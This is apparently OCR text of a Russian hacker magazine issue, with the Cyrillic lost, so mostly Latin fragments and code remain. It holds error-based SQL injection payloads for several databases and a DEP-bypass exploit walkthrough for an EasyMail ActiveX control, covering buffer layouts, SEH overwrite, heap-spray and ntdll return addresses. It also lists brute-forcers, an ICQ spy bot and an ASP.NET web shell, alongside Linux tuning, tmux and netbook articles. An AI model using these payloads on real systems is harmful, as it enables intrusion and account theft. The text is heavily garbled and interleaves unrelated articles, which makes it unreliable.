4') from dual;
UTL_RAW.CAST_TO_VARCHAR2('61646D69
6E3A3A5040737377307264')

MySQL>=5.0: /?param=(1)and(select
1 from(select count(*),concat(v
ersion(),floor(rand(0)*2))x from
information_schema.tables group
by x)a)--

admin::P@ssw0rd
SQL>

Oracle >=9.0: /?param=1


and(1)=(select upper(XMLType(ch
r(60)||chr(58)||chr(58)||(selec
t replace(banner,chr(32),chr(58))
from sys.v_$version where
rownum=1)||chr(62))) from dual)--

,
error-based
blind SQL Injection :
PostgreSQL, MSSQL, Sybase,
MySQL >=4.1 Oracle >=9.0.

http-, :
PostgreSQL: /?param=1
and(1)=cast(version() as
numeric)--

,
- .
, ,
SQL .
.
, z !



Digital Security, dookie@inbox.ru



,
,

.

DEP

HARDWARE-DEP
,
DEP.
,
. DEP
, ,
.


ActiveX
IE6/IE7,

QuickSoft EasyMail Object

,

. ,
SubmitToExpress() 256
, ESI,
SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD

,
heap-spray
SEH CALL [ESI+CC]
.


, ,
DEP (Data Execution Prevention),
, .
ActiveX, DEP,
, ASLR (Address space
layout randomization), ,
.
.

WHO IS MISTER DEP?

,
DEP , ,
.
, DEP ,
Microsoft,
NX/XD (,
AMD NX, Intel XD)
. , ,
.
- , EIP
,
(, ,
). ,

DEP
NX/DX Windows c (>= Windows XP SP2).
Microsoft ,
software-DEP.
. , ,
/ .

SEH .
SafeSEH,
DEP.

ACCESS VIOLATION

, DEP?
? , , DEP.
,
. BIOS
,
. Intel Core2
Duo , . , ,
software-DEP
( NX/XD ,

DEP, DEP :). ,


Windows XP, DEP .
IE6/IE7 .
.
DEP . C:\boot.
ini, ,
,
,

DEP
. FrontEnd
C:\boot.ini.
DEP:
/noexecute=OptIn
XP/Vista. DEP

DEP
,
E Access.

DEP IS DEAD

DX
/noexecute=OptOut
Windows Server 2003 SP1. DEP
,
.
/noexecute=AlwaysOn DEP
, .
/noexecute=AlwaysOff DEP (
).

.
SysInternals Process Explorer
.
software-DEP OptOut, IE7 . ,
, SEH
, ,
,

.

.
, ,

CALL . ,

SEH
.
, ( ), CALL
[ESI+CC] ,
software-DEP. ,

, ,
,
SEH- (
heap-spray.
, software-DEP,
, hardware-DEP
( NX/
XD). , , SEH
,
. ,
, NOP
Access violation when executing [0D0D0D0D]. , ,
JavaScript heap-spray,
.
,

,
DEP. ,
ret2libc.

, .
, ,
, ,
, WinExec. ,
WinExec
! ,
,

,
-, ,
/ ,
/
cmd.exe ( ). ,
.
-. , ,

- . 2005
DEP .
,
VirtualAlloc() .
, ,
,
( , ),

,
. memcpy(),

.
memcpy(), ,
.
, ,
, .


IN PVOID ProcessInformation,
//
DEP ,
0x0000002
IN ULONG
ProcessInformationLength
// (0x4) 4
);

DEP



! , ?
Skape Skywing
ntdll.dll:
Address1:
cmp al,0x1 ; EAX=1 ?

Process Explorer
DEP
VirtualProtect(). , ,
, VirtualProtect()
(
, 0x000040 RWX)
. .
VirtualProtect(
IN
LPVOID lpAddress,
// 0x0D0D0D0D
IN
SIZE_T dwSize,
// 0x1
IN
DWORD flNewProtect,
// - 0x40
IN
PDWORD lpflOldProtect
// , ,
( ),
0x05050505
);


VirtualProtect
. Windows
API DEP? Windows
XP SP3 ( )
API SetProcessDEPolicy(),
- DEP. , -,
. .
SetProcessDEPolicy()
NtSetInformationProcess():
NtSetInformationProcess
(
IN HANDLE ProcessHandle,
// , 0xff

push 0x2 ; 0x2


( )
pop esi ; ,
(0x2) ESI
je LdrpCheckNXCompatibility + 0x1a
; EAX=1
. . .
mov [ebp-0x4],esi ;
0x2( ESI) EBP-4
jmp LdrpCheckNXCompatibility +
0x1d ;
. . .
; , 0? ( 0x2)
cmp dword ptr [ebp-0x4],0x0
jne LdrpCheckNXCompatibility+0x4d
; 4!=2,
. . .
push 0x4 ; 0x4

IN PROCESS_INFORMATION_CLASS
ProcessInformationClass,
// 0x22

lea eax,[ebp-0x4] ; EAX


ebp-0x4, 0x2

DEP -
push eax ;
0x2
push 0x22 ; 0x22
push 0xff ; 0xff (-1)
call NtSetInformationProcess
; ,
; DEP
jmp
LdrpCheckNXCompatibility +
0x5c ; ...
. . .
pop esi
leave ;
ret
0x4 ; 4


, ,
( AL )
DEP ,
. ,
,
LEAVE ,
, , ESP = EBP. ,
EAX 1. ,
,

1. , , , AL
, ntdll.dll:
. . .
Address2
mov
al,0x1
ret
0x4

retn 8. :


(Ctrl+S):
al,1
retn 0x4

Address2.
Address1 :
cmp
push
pop

al,0x1
0x2
esi

FIGHT!

OllyDbg (File>Attach) iexplore


.code ntdll.dll
(View->Memory).

.
,
EBP 0x4646464646 ,
(BBBB). DEP,
EBP 0x2:
mov


, ,
. ,
ESI. , ,
, CMP
[ESI+180],1. :
xor ebx, ebx ;
push -1
cmp [ESI+],EBX ; 0


CALL [ESI+CC], .
, ,
ESI+CC 0. ,
0, ret
:
call emsmtp.026c6232 ;

xor eax,eax ;
pop edi ;

, :
cccc260ccccAAAAffffBBBBCCCCXXXXX
XXX100XXXXXXXXXXX
AAAA=0x05050505
BBBB=Address2
CCCC=Address1
X=0x0D

cccc260ccccAAAAffffBBBBffffffffC
CCCXXXXXXXX100XXXXXXXXXXX

pop esi
pop ebx
leave
;
retn 0x8
;
(AAAA)

,
,
, NOP .
ESI 0x05050505, 0 ,
,
BBBB CCCC, BBBB

[ebp-0x4],esi

, ,
, , leave NtSetInformationProcess!
,
(BBBB ),
,
. , ActiveX
ASCII .
0x7C, ActiveX ? 0x3F.

,

0x7C. DEP,
ActiveX. ,
CALL [ESI+CC] ,
.
, , ESI+CC
,
, .
,
! CALL .
.
: CALL
DEP,
, . CALL
AL , ,
je LdrpCheckNXCompatibility+0x1a
DEP.
, CALL,
ActiveX,

MultiByteToWideChar(). , Z
. ? ,
,
je. Z=1,


, . ,
CMP AL,1,
2 , , PUSH 2.
, je
DEP. ,

. :
cccc260ccccAAAAffffBBBB

AAAA = 0x05050505 ,
Address1
BBBB = 0x0D0D0D0D ,
, ,
Address1 . , 0x7C91CD26.
ntdll.dll.
, ,
, DEP.
,
, .
0x0D0D0D0D ,
,
, ,
CALL[ESI+CC] (0x050505D1) ,
, 0x267C91CD.
, : 36 .
36 ,
. 4 . ,
,
( ,
). ,
,

NtSetInformationProcess


DEP
, ,
0xXXYY0000. ,
0xXXYY0024 (
+ 4 ).
0x4, +0xCC
, 0xD1.
0x3
0x05050508.
,
little-endian .
(

DVD).

DEP
,
.
,

,
, DEP. , ,
, Z
CALL ,
,
,
ret2libc .
(ASLR),
VirtualProtect
NtSetInformationProcess. .
, IE8 DEP .
, IE8
DEP (
SetProcessDEPPolicy).
DEP-
ret2libc,
NtSetInformationProcess
. , ,
,
BlackHat 2010 DC,
(Dionysus Blazakis) IE8 ASLR( ) DEP. ActionScript Java,

.
JIT-spray,
z


icq 884888

X-TOOLS

: ProxFetch
: *NIX/WIN
: X1MACHINE

:).
K-Shell
, ASP.NET

, IIS.
K-Shell
, PHP:

K-Shell


(, ,
, ..). ,
,
,

ProxFetch x1machine.com.
, ProxFetch
,
,
,
ip . :

;
c++,
;
;
;

;
GeoIP;
;
-;
TOR;
.


ProxFetch
x1machine.com/?p=72.

: K-SHELL
: WINDOWS 2000/2003/XP/VISTA/7
: KIKICOCO


(md5);
( CMD.NET,
W32, WSH, SQLServer);
( );

(Server IP, Machine Name, Network
Name, User Name ,
OS Version, System Time, IIS,
, ,
, );

/;
;
;
IIS;
;
event ;
(, , ,
, , ,
, );

.

,

.

: ICQ EXAMBOT
: WINDOWS 2000/2003/XP/VISTA/7
: WWW.NAKODIM.RU

-?
ICQ Exambot
nakodim.ru.
icq-,
-


.

,
5000 (1200 ICQ).

,
.
,

( .NET Framework 2.0).
! :)

: VKONTAKTE MULTITHREADS BRUTEFORCE WITH ANTICAPTCHA && PROXY
: *NIX/WIN
: DR.TRO

(
:),
Dr.TRO, Perl.
:
perl brute.pl <threads> <proxy change time> <pause> <anticaptcha key> <accounts file> <passwords file> <proxy file> <nobad> <spliter>


:
<threads> ;
<proxy change time>
,
;
<pause>
;
<anticaptcha key> ;

: ICQ SPY BOT V 1.0


: WINDOWS 2000/2003/XP/VISTA/7
: INSIDER


<accounts file>
;
<passwords file>
;
<proxy file> ;
<nobad> ;
<spliter>
.

!
AntiCaptcha.
pm, .

: [ WEB ] BRUTE FORCER V1.1
: WINDOWS 2000/2003/XP/VISTA/7
: [X26]VOLAND

, basic-
-?

- 1' or 1=1/*,


. [ Web ] Brute Forcer
[x26]VOLAND
:).
:

POST;
GET;
basic-
HEAD;
FTP;
( 1 1000 );
REQUEST ;
Cookies;

( );
3 (1 , , 1 );
plain HTML
input , ;
(,
, ).

-
,
- .
<form>.
action url
URL. method
/ .
<form>
<input> ( ).
, ,

.
<input> name.
login, nickname,
username .., .
name
.
.

( name value) request-.
<form> <input>
type=submit, . Submit-.
- <input>
name, .
. ,
.
, (
/
, ).

(

), ,
, ,

(
).
( ) ,
. Enjoy!

,
forum.antichat.ru/thread109600.html.:)



/
ICQ SPY BOT.
,

.
:
;
;
;
;

;

( 800 );
ICQ ;

;
IP ;
;
;
;

PID;

;
;

;

url;
;
;
.

,

.
,
,
:). z



Mifrill maria.nefedova@glc.ru



2010

-
2009 , , lan- .
,
, ,
.
,

CAROLINACON

: 19 21
: ,
: www.carolinacon.org

CarolinaCon

2005 ,
.
,
,
Microsoft, Intel
. CarolinaCon
2600.
?
. ,

,


. , ,

, , ,
- . ,
, 2010
.
,
.

:
Linux ?,
, , ,
OMG! !!!.
,

, .

CANSECWEST

: 20 26
: ,
: cansecwest.com

,
?
,

,

CanSecWest.
, ,
, IT-.
, , , .

(, ) ,
, ,

. ,

.

SUN TECH DAYS

: 8 9
: -,
: developers.sun.ru/techdays2010

Sun Tech Days ,


, , ,
.
Sun Microsystems STD
,
.
,
( !),


Sun, .
, ,
Java,
.

HACK IN THE BOX

: 19 22 ; 29
2
: , ; ,
: www.hackinthebox.org

Hack in the Box


,
. HITB 2003
:
,

. ,

, ,
IT-
.


,
HITB, , . , , ,
.
HITB Dubai,
, , , .



: .


,
.

, -,
McAfee;
TEHTRI-Security
;
. ,
.

BLACKHAT EUROPE
: 12 15
: ,
: www.blackhat.com


BlackHat, , ,

, .
BlackHat
.
13 . ,
BlackHat Europe.

,
,
: SAP ,
Adobe Flash, PDF Adobe Reader ,

,
ZIP, 7ZIP, RAR, CAB.
:
,
Fortinet Inc., Invisible
Things Lab,
Trustwave Spiderlabs, Context
Information Security .
:



HOPE.

, ,
, .
,
,
, ,
. , ,
BlackHat ,

-,
IEEE 802.11, TCP/IP .

NOTACON

: 15 18
: ,
: www.notacon.org
Notacon
,
, .
, , 2003
, ,
,

.
, ,
, ,
; , ,
,
,
. ,
Notacon

, , , .
, , ,

.

BLACKHAT USA

: 24 29
: -,
: www.blackhat.com
BlackHat
, - -. ,
,
, ,
.
, IT-,
.
, BlackHat 2010 ,
,
,
, BlackHat
2010 .

HACKERS ON PLANET
EARTH (HOPE)
: 16 18
: -,
: thenexthope.org

1994 2600: The


HITB'09
!

Hacker Quarterly,
.
HOPE
,
. ,
:
HOPE: Hackers On Planet Earth, Beyond HOPE,
H2K, H2K2, The Fifth HOPE, HOPE Number
Six, 2008
The Last HOPE.
08
2010- The
Next HOPE,
.


, ,
, - ( ).
-, Cult of the Dead Cow.
, ,
,
. ,
,
.

ASSEMBLY

:
: (),

: www.assembly.org

. Assembly
-
1992 .
, Assembly (

DEFCON , , ..
.
HUMAN .
9 .

) -
5000 .
,
-
, ,
.
2007 Assembly
: Assembly Winter,
, ,
( -);
Assembly Summer
,
. - ,
.
Assembly Winter10, , ,
, - . Assembly Summer
,
.
, , ,

.

DEFCON

: 30 1
: -,
: www.defcon.org
-,
IT-. DEFCON
,
.
,
18
, :).
DEFCON
,

HACKERS
ON PLANET EARTH.
,
, ,
,
. DEFCON 18
:
,
15
, , ; IT

,
,
, DEFCON!;
, ,
, , ,
, , p2p .
,

.

CHAOS CONSTRUCTIONS

:
: - (),
: cc.org.ru
Chaos Constructions, CC,
,

, CC
1995 .
, , -,
,
, , . Chaos
Constructions
,

, -,

.
\ , ,
,
,
. Chaos Constructions, , ,
,
.
CC10 ,
, ,
, . z


UNIXOID
hatchet maks.hatchet@yandex.ru

, ,
, , ,
. ,
( )
, .
,
.
,

(, , ). ,
:
. , 4 2 ,
,
.
,


( ).




.
,

.

Linux
/proc /sys. ,
,

. ,
:
$ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor


,
:

# echo conservative > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor

cpufreq 11
, ,

. :
$ ls -1 /sys/devices/system/cpu/cpu0/cpufreq
affected_cpus ,

cpuinfo_cur_freq

cpuinfo_max_freq
cpuinfo_min_freq
scaling_available_frequencies

cpufreq-info,

: , ,
.. :
$ sudo cpufreq-set -g powersave

'-f':

cpufreq-info

scaling_available_governors
scaling_driver
scaling_governor

scaling_max_freq
,

scaling_min_freq
,

scaling_setspeed

,

Linux,
:
1.
,
. ,
,
cpufreq.
:
acpi-cpufreq ACPI (P-States Driver)
p4-clockmod Pentium 4
speedstep-centrino Pentium M
speedstep-ich Pentium III-M, P4-M, ICH2/ICH3/ICH4
speedstep-smi Pentium III-M, 440 BX/ZX/MX
powernow-k6 AMD K6
powernow-k7 AMD Athlon
powernow-k8 AMD Opteron, Athlon 64, Athlon64X2, Turion 64
cpufreq-nforce2 nVidia nForce2 ( FSB PCI/AGP)
,
.
2.

, -
. Linux

:

1. performance ,
,
.
2. ondemand .
3. conservative ondemand,
( ,
).
4. powersave .
5. userspace ,

.

,


:

$ sudo cpufreq-set -f 1.22 GHz



GOVERNOR /etc/init.d/
cpufrequtils (
ondemand).

,
.
,
.
fancontrol
lm-sensors.
,
lm-sensors, ,
sensors-detect.
<Enter>.
Do you want to add these lines automatically?,
yes,
modprobe.
:

# modprobe cpufreq_ondemand


scaling_governor:
# echo ondemand > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor


.
ondemand ,
, ,
, . ,
. ,
userspace,

scaling_setspeed:
# echo 1000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_setspeed

scaling_
available_frequencies. ,
, cpufrequtils,
. Debian/Ubuntu:
$ sudo apt-get install cpufrequtils

$ sudo modprobe i2c-nforce2 asb100


w83l785ts

, sensors.
,
.
CPU Fan CPU Temp,
.
( 4000 ),

( 60 ).
. ,
fancontrol,

, .
,

pwmconfig,
.
pwmconfig <Enter>
. ,
Select fan output to configure, or other
action:, 1
.
,
,


hdparm:
. ,
,
.
, ,
.
,
<Enter>,
.
pwmconfig
, , , fancontrol:
$ sudo /etc/init.d/fancontrol start

, fancontrol
(
),

. ,
Acer Aspire One
acerhdf (www.piie.net/?section=acerhdf).
Sony Vaio Fan Silencer (www.taimila.com/fansilencer.php). ,

.

, , -
,
, .
:

,
,

( 3D-).
,
.
. nVidia,
Linux nvclock (www.linuxhardware.org/nvclock).

,


,
.
'-i'
-- Sensor info --,


.
nvclock '-f' '-F',
:
$ sudo nvclock -f -F 60

10 100
10. ,
.


, .
, ,

. , ,

.
?
, .
,
,
.
,
.
,
. :
,
, .
,

.
,
,
, .
,
.

nvclock , ,

, /etc/fstab ( swap
).

, ext4,
,
.
, , Linux
,

. ext2, ext4, reiserfs, , ,

FAT, .

,
defrag (http://ck.kolivas.org/apps/defrag)
Shake (http://vleu.net/shake). .

(shake-0.99.1-Linux.sh),
.
, , .
Debian Ubuntu
apt,
http://vleu.net/apt.
,
:
$ sudo shake -pvv ///

5
15
.
.
.
.

( )
. ,
,

.
-
.
, Linux
,

.
/proc/sys/vm:
$ ls -1 /proc/sys/vm
laptop_mode (120)

-
(

,
?).
dirty_writeback_centisecs (12000)

.
dirty_expire_centisecs (12000)
.
dirty_ratio (10) , (
).
dirty_background_ratio (1) ,
.

, .

sensors lm-sensors
,
.
, ,
,
,

.
hdparm. , :
$ sudo hdparm -B 1 -S 12 /dev/sda

'-B 1'
. 254, 1

pwmconfig

127 ,
.
'-S 12' , .
255 : 1 240
5 , 0 .
Automatic Acoustic Management,

,
(, , 10%).
-
hdparm. :
$ sudo hdparm -M 128 /dev/sda

, 254.
,
/,
,
(, 128 , 254 , ,
, ,
).

,
,
, . ,
, ,
.z


UNIXOID
zobni n@gmail.com

GNU Screen
tmux

GNU Screen UNIX- .


, . Screen FAQ , .
?


tmux

?
, , SSH-.
,
,
.

.
, .
<Ctrl+Z>,
,

, jobs. SSH-
, .
?
Screen


. ,
Screen , SSH-
. ,
screen, .
less /
var/log/messages, <Ctrl+A C>, , top,
irssi ..
<Ctrl+A P>
.
SSH-.
Screen .
<Ctrl+A D>,
Screen 'r',


. ,

-,
,
. ,
.
, Screen.

,

mutt alpine
.

, X- ,
GTK- QT- .
, ,
, ,
(, ()
, ratpoison, ion3 dwm,
Screen).

?
Screen. .
-, ,
,
. -, Screen

,
..,
,

.
, ,
,

. ~/.screenrc
:

$ vi ~/.screenrc
# no startup message
startup_message off
# UTF-8 by default
defutf8 on
# visual bell instead of the audible one
vbell on
# scrollback buffer, in lines
defscrollback 1000
# detach automatically when the terminal hangs up
autodetach on
# start a login shell
shell -$SHELL
# xterm: do not use the alternate screen, so the terminal scrollback keeps working
termcapinfo xterm* ti@:te@
# dynamic window titles
shelltitle '$ |sh'
# status line
hardstatus alwayslastline "%{+b wk} %c $LOGNAME@%H %=[ %w ] "
# <Esc> opens a root shell (window 9) via su
bind \033 screen -ln -t root 9 su

.

. Screen
.
:

.
, , Screen
,
shelltitle. '$ |sh',
,
,
'$ ' (

), sh (
).
.
, ~/.bashrc:
case $TERM in
screen)
    # no spaces around '=' in a shell assignment
    export PROMPT_COMMAND='echo -n -e "\033k\033\\"'
    ;;
esac

,
(hardstatus). Screen ,
.
:
12:18 user@hostname [ 0 sh 1 mc 2* irssi ]


Screen

tmux

_@_,

.
.
Screen
, ,
(
PS1). screen,
.
<Esc>
root-.
Screen
, .
- ,
, .
.
, ,
Screen
<Ctrl+A> (<C-a>
Screen),
- .
<C-a c>
,
.
:

Screen
C-a 0..9
0..9
C-a "

C-a n

C-a p

C-a c

C-a k

C-a C-a

C-a S


C-a |


C-a Tab

C-a z

C-a d
screen
C-a M

C-a ?

C-a :
Screen

<C-a d>, , Screen


.
,
,
( screen),
.
'-ls' screen,
'-r'.
,
'-x',
'-r'.
<C-a M>,
.

Screen ,

TMUX:
set -g lock-after-time 1800
set-password -c '$2a$06$7LpuTSfDjcz.KD3a9mdEuuJmC.zEq6RBqHWMjdv9/qqzrfWedUBHe'
bind L lock-server



. , ,

watch. Screen
. <C-a C-[>
.

<C-a C-]> .
<C-a h> Screen ,

less. :
hardcopy._. ,


bind .
, ""
<C-a Space>
:
bind ' ' windowlist -b

, <C-a S>
:
bind S split


:
bind m screen -t mail mutt

<C-a m>
mail,
mutt.

Screen:
screen -t mail 0 mutt
screen -t irc 1 irssi
screen -t google 2 elinks http://www.google.com

~/.screenrc
Screen,
mutt, irssi
elinks.

SCREEN'
4.6 OpenBSD Screen

tmux. GPL-, tmux


, Screen :
* - ,
,
,

().

.
.
: vi emacs.
.

.
.
.
UTF-8.
, .
.
OpenBSD, tmux UNIX-,
FreeBSD, NetBSD, Linux, Mac OS X, Solaris AIX. tmux Debian
Sid Ubuntu Karmic,
tmux : http://tmux.sourceforge.net. tmux,
Screen. -,

, Screen

. -, <C-a> ,
<C-b>.
,
Screen ( ). <C-b>, Screen. , <C-b c>
, <C-b 1>
.
.
, <C-b w>
, <C-b l> ,
<C-b "> ,
<C-b &>.
<C-b d>,

:
$ tmux attach

tmux ,
,
, . , :
$ tmux last-window

:
$ tmux new-window

Screen

tmux ,
,
bind,
,
tmux
.
tmux
. set-option
, set-window-option
.
(set setw),
'-g'.
, , , ,
. :
$ tmux show-options
$ tmux show-window-options

WARNING
tmux



15 (

),
,
.

man-. , :
$ vi ~/.tmux.conf
# status bar background
set -g status-bg white
# right part of the status bar: user@host and uptime
set -g status-right '#(echo $USER)@#H #(uptime | cut -d "," -f 1)'
# vi key bindings
set -g status-keys vi
setw -g mode-keys vi
# history size
set -g history-limit 1000
# use <C-a> as the prefix
set -g prefix C-a
unbind C-b
# <C-a C-a> switches to the last window
bind C-a last-window
# <C-a M> turns on activity monitoring for the window
bind M setw monitor-activity on
# <C-a /> opens top in a new window
bind / neww 'exec top'

INFO
<C-b t> tmux

, .

.

$ tmux list-commands


UNIXOID
ADEPT ADEPTG@GMAIL.COM

:
status-left status-right. , .
Screen, :
#()
( )
#H
#S
#T
## #

, ,
. @, ,
echo $USER
( ), uptime | cut -d "," -f 1 ( )
#H.

bind new-window (neww).

, , . , tmux
attach, , ,
mutt, irssi:

tmux


2010- UNIX
, 3D-.
, UNIX
, .
(
).
elinks (http://elinks.or.cz).
, ,
, , JavaScript, , ,
, (Perl, Lua, Guile).
alpine (www.washington.edu/alpine). .

pine. ,
.
mutt, , ,
.
IM- centerim (www.centerim.org/index.php/Main_Page).
IM- centericq. .
: ICQ, Yahoo!, AIM TOC, IRC, MSN, Gadu-Gadu
Jabber. ,
.
Twitter- ttytter (www.floodgap.com/software/ttytter). Twitter-, Perl.
( ,
).
sdcv (http://sdcv.sourceforge.net).
StarDict.
.


new -d
neww -d mutt
neww -d irssi

new-session,
. .
'-d' , tmux
.

tmux. Screen,
<C-b ">, <C-b o>, <C-b>
. <C-b Alt-Up> <C-b Alt-Down>.

, <C-b Space>. ,
, , ,
. ,
.

centerim


DVD




screen tmux,

HTTP://WWW
http://cli-apps.org

UTF-8 tmux , (Nicholas Marriott)

, GNU Screen
tmux, .


,
,
, . z


UNIXOID
Adept adeptg@gmail.com



Linux
-

, Linux,
( Windows 7
Starter, ). ,
! - /SSD 4 .
LET'S MORTAL KOMBAT BEGIN

(
Asus Eee
PC 701) , ,
,
,
.
- .
-


(, Linux4One Kuki Linux


Acer Aspire One Leeenux
Eee PC). ,
, .
,

the best of the best.
?


x86- , Gentoo Atom'
. ,

:
,
. 10"
Gnome/KDE -
, 7"
.

- Chromium OS


.
,
,
OpenOffice :).
, , , , ,
? , :
Ubuntu Netbook Remix
;

Moblin Linux Intel, 2009 Linux


Foundation;
Google Chrome OS ,
Google;
Jolicloud .


Lenovo ideapad s10-2
:

MOBLIN VIRTUALBOX
, Moblin ,
VirtualBox. :
1. img iso.
2. , IO APIC PAE/NX. .
3. , Moblin ( Live-
, ).
4. <F1> GRUB. , quiet vga=current, 3,
runlevel.
5. /etc/inittab,
/usr/sbin/moblin-dm /usr/bin/startx.
Hint: Moblin 2.1 VirtualBox 3.1 :).


: 10.1", 1024x600;
: Intel Atom N270 1.6 ;
: Intel GMA950;
: 1 ;
: 160 ;
: 10/100 / Ethernet, 802.11b/g, WiMAX.
, ,
.



Ubuntu Netbook Remix (UNR)
Ubuntu Canonical
( , Ubuntu Moblin, ).
Ubuntu -
,
, . 10.04
, Gimp Tomboy.
, .
: Intel
Atom, 512 4
, , .
-
3 : ,


MOBLIN
Moblin , , .
Ubuntu:
Moblin . ppa (https://launchpad.net/~moblin/+archive/ppa). , ppa .
Debian:
Moblin testing unstable. ( tasksel) , . :
# apt-get install gtk2-engines-moblin moblin-cursor-theme moblin-icon-theme \
    moblin-sound-theme moblin-menus moblin-panel-applications \
    moblin-panel-media moblin-panel-myzone moblin-panel-pasteboard \
    moblin-panel-people moblin-panel-status moblin-session mutter-moblin
Fedora:
# yum groupinstall "Moblin Desktop Environment"
Mandriva:
# urpmi task-moblin
OpenSUSE:
Moblin 2.1 OpenSUSE 11.2
.

.
42 (
), 15,
4 ( VIA,
Intel GMA 500). , 4
,
community :).
, ,
9.10. 2010,
Ubuntu,
10.04.
, Ubuntu,
. :
Desktop Switcher,
Gnome'
Netbook Remix.
UNR Launcher
Gnome.

. (Favorites),
.

Go Home

UNR Launcher.
,
UNR
Launcher.
Window Picker
Gnome, ,
.
,

.
Maximus
. .
UNR , , . :
Easypeasy , UNR
( .. : Skype, , ),
.

1.5, Ubuntu 9.04.

CHROMIUM OS
Chrome OS (, Chromium OS)
Ubuntu 9.10, :
1. : <Ctrl+Alt+T>
2. :
$ sudo mkdir -p /var/cache/apt/archives/partial
$ sudo mkdir -p /var/log/apt
3. rw:
$ sudo mount -o remount,rw /
4. sources.list:
$ echo "deb http://mirror.yandex.ru/ubuntu karmic main restricted" | \
sudo tee -a /etc/apt/sources.list
5. :
$ sudo apt-get update


,
Chromium OS
Eeebuntu NBR UNR,
Asus Eee PC (
). . NBR (Netbook Remix),
Standard ( Gnome),
Base (
) LXDE (, LXDE
).
3,
Ubuntu 9.04. 4 Debian
Unstable.
Leeenux Easypeasy ,
. 7" (Asus Eee
PC 701),
1,2 . 31 2.0 (
Easypeasy 1.5),
3.0, UNR
9.10.

LINUX FOR INTEL


Moblin Intel (
Linux Foundation)
MID
Intel Atom.
GNOME Mobile Clutter (
).

2.1, -
.
: Intel SSSE3 (Atom Core 2, SSSE3 ), Intel (Nvidia, AMD Intel GMA500
). 17
5 . , 5

( Intel
). ,
- . ,

Linux Foundation,
.
Moblin
, dd

.

Moblin' ,
-.
(, twitter last.fm).
12 :
MyZone , ,
;
Status
;
People ;
Internet , Firefox 3.5. -
;
Media / . -
;
Pasteboard ;
Applications (
) ;
Zones (
<Alt+Tab>);
4 , , Bluetooth .
, Moblin
-, . ,
:
ext4,
2.6.31;
GUI-
(Connman)
, IP- ( DHCP);
-
;
/
;
.
mc! :)

Ubuntu Netbook Remix


Login-screen Chromium OS Zero


,

Google. ,
( Chromium OS www.chromium.org/chromium-os)

Live CD/USB.
LiveUSB Chromium OS Zero (http://chromeos.hexxeh.net).
, , ,
Chrome OS Google Google Google.
. ? !
Google Docs. ? Google Mail! IM-?
Google Talk! , (
Chromium OS Ubuntu)!

INFO
MID (Mobile Internet
Device)
(
4-7 ),
,
,

-.
SSSE3
(Supplemental
Streaming SIMD
Extension 3)
,
Intel'
.
SSE3,
32
,
.
,
Chromium
OS
,
.

Google,
Chrome
OS (

x86, ARM
)

2010.


Moblin


:
Google
.
.
Chromium OS
Google ,
7 .
,

.
Chrome OS
, -
.


// .
(

:) ) (, ),

.
, /
.
Google- ( , ,
).

(, Google Chrome)
Google Mail.
Chrome (
).
,


. , ,
,
,
:). Chromium
OS 19 : ,
Google ,
Yahoo! Mail Hotmail.
(, , )
. <F8>,
.
, :
<Ctrl+Alt+T> ,
!
, Chromium
OS ,
( ,
Ubuntu). wiki- 15
.
, -, ,
Google , .

(, CAD- -
?)
.

Moblin



Jolicloud


, Google.
. -
$4.2
. Ubuntu,
- Debian - JoliCloud, -
Ubuntu Netbook Remix Chromium OS. ,
, , -, Google.
:
ISO- ( LiveCD).
JoliCloud , ,
Ubuntu.
Windows ( XP
7).
, . /
. !
( Intel GMA500 VIA
C7M). , JoliCloud 98%
. 75 /, 7
3 . 98%
:).
.

JoliCloud-. :

.
, Web- Mozilla Prism.

JoliCloud.
.

JoliCloud (- )
, .
-,
(
, ).
, , JoliCloud-,
UNR:
;

Jolicloud.

Flash Gears Firefox;


.

. ,
, PreBeta (0.3).


4 , , , .
Ubuntu Netbook Remix Ubuntu,
(
-- Ubuntu One).
, .
,
.
Moblin ,
. -
IRC. ,
(. Moblin
).
Google Chrome (Chromium) ,
. .
Google Groups (chromium-os-*)
IRC. , .
Jolicloud .
,
. ,
, ,
Windows , Linux-.
(www.techreviewonlineforum.com/jolicloud-forum-f17.html), Facebook
( 5000 ) twitter (http://twitter.com/jolicloud).
Linux . z

DVD



.

HTTP://WWW
:
www.ubuntu.com
moblin.org
www.chromium.org
www.jolicloud.com

:
www.phoronix.com/scan.php?page=article&item=chromium_moblin_benchmarks


CODING
c0n Difesa condifesa@gmail.com) http://defec.ru

.NET REMOTING:
GRID-


(), , - .
,
.



. ,

,
.
.
,

:
, , ,
. -
,
,
. ,
( ,

).

.

, , ,
.


, ,
.
. , ,
.
.
- ( . grid ,
) , , (), . ,
.
,
, ,
.
, ,
.
, (,

)

, .

, .

,
. ,
,
, . , ( ) ,
.
, ;).
,
.

(dedicated servers)
;). ,
, MD5, -,
, ,
.
.

? !

Microsoft .NET C#. MS


,
MSDN .

-

, .NET .

, .
, .NET
,

. , .NET Remoting. ,
- ,
C#, , , (,
, ..). ,
, , .

, ,
( -).
- ,
, ,


. :

, . , . ,
,
.NET Remoting .


( 39993),
, .
:
,
, ,
. , ,
, :
, , , .
:
.
Microsoft
: , ,
. :

, , ,
.
, , -.
(remoting)

// TCP server channel on port 39993
TcpServerChannel channel = new TcpServerChannel(39993);
ChannelServices.RegisterChannel(channel);
// register the remotable type
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(Bot),                      // the type
    "Bot",                            // URI
    WellKnownObjectMode.SingleCall);  // activation mode

URI, Uniform Resource Identifier (


) ,
: URI
, Bot.
, ,
:
// client TCP channel
TcpClientChannel channel = new TcpClientChannel();
ChannelServices.RegisterChannel(channel);
// register the remote type on the client side
RemotingConfiguration.RegisterWellKnownClientType(
    typeof(Bot),                      // the type
    "tcp://localhost:39993/Bot");     // URI

INFO

:
hash.txt
,
distribute.exe
client.exe.

DVD



Microsoft
Visual Studio 2008.

URI .
( , TCP)
, .
(localhost,
IP- ) , Bot ,
. URI
,
( , 39993).

ALEKSANDR-EHKKERT@RAMBLER.RU

: , Bot ,
System.MarshalByRefObject:

public class Bot : MarshalByRefObject
{
...
}

,
, .
, :
Bot brain = new Bot();

brain , ,
,
, .
, ( )
. ,
, , (
, ), .
,
.


():

// number of processor cores
int Core = (Int32)System.Environment.ProcessorCount;
// clock frequency (MHz)
int Takt = (Int32)Registry.GetValue(
